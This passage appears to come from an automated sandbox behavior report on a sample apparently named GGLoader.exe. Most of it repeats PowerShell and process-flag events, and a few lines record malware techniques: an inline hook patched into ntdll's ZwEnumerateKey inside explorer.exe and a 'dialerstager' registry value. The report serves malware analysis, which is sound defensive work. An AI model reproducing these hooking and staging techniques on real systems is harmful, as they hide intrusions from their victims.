                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                        Modifies the prolog of user mode functions (user mode inline hooks)
                        Source: explorer.exeUser mode code has changed: module: ntdll.dll function: ZwEnumerateKey new code: 0xE9 0x9C 0xC3 0x32 0x2C 0xCF
                        Source: C:\Windows\System32\dialer.exeKey value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node dialerstager
                        Source: C:\Users\user\Desktop\GGLoader.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\GGLoader.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\GGLoader.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\GGLoader.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\GGLoader.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\GGLoader.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\GGLoader.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\GGLoader.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\GGLoader.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\GGLoader.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\GGLoader.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\GGLoader.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\GGLoader.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\GGLoader.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\GGLoader.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\GGLoader.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\GGLoader.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\GGLoader.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\GGLoader.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\GGLoader.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\GGLoader.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\GGLoader.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\GGLoader.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\LicCheck.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
